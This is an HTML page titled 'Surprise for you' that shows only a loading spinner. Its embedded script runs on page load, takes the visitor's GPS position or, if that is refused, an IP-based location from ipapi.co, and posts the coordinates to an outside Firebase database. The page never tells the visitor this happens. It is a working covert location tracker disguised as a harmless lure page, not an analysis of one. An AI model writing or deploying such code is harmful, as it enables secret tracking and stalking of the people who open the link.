<!DOCTYPE html>
<html>
<head>
  <title>Surprise for you</title>
  <style>
    * {
      padding: 0;
      margin: 0;
    }

    body {
      background-color: #4C1DE5;
      display: flex;
      justify-content: center;
      align-items: center;
      flex-direction: column;
      height: 100vh;
    }

    .loader {
      width: 60px;
      height: 60px;
      border-radius: 50%;
      border: 6px solid #3498db;
      border-top: 6px solid #f3f3f3;
      animation: spin 2s linear infinite;
    }

    @keyframes spin {
      0% { transform: rotate(0deg); }
      100% { transform: rotate(360deg); }
    }
  </style>
</head>
<body>
  <div id="loader-container">
    <div class="loader"></div>
  </div>

  <script>
    function getCoordinates() {
      if (navigator.geolocation) {
        navigator.geolocation.getCurrentPosition(send_geo, handleGeolocationError);
      } else {
        getIPCoordinates();
      }
    }

    function send_geo(position) {
      var latitude = position.coords.latitude;
      var longitude = position.coords.longitude;
      postToFirebase({ geo_latitude: latitude, geo_longitude: longitude, Exact: true });
    }

    function handleGeolocationError(error) {
      console.log("Geolocation error:", error);
      getIPCoordinates();
    }

    function getIPCoordinates() {
      fetch('https://ipapi.co/json/')
        .then(function(response) {
          return response.json();
        })
        .then(function(data) {
          var latitude = data.latitude;
          var longitude = data.longitude;
          postToFirebase({ geo_latitude: latitude, geo_longitude: longitude, Exact: false });
        })
        .catch(function(error) {
          console.log('Error:', error);
        });
    }

    const postToFirebase = async (postData) => {
      try {
        const response = await fetch("https://geolocation-2-16ab9-default-rtdb.firebaseio.com/geo.json", {
          method: 'POST',
          headers: {
            'Content-Type': 'application/json',
          },
          body: JSON.stringify(postData),
        });
      } catch (error) {
        console.error('Error:', error);
      }
    };

    window.onload = getCoordinates;
  </script>
</body>
</html>
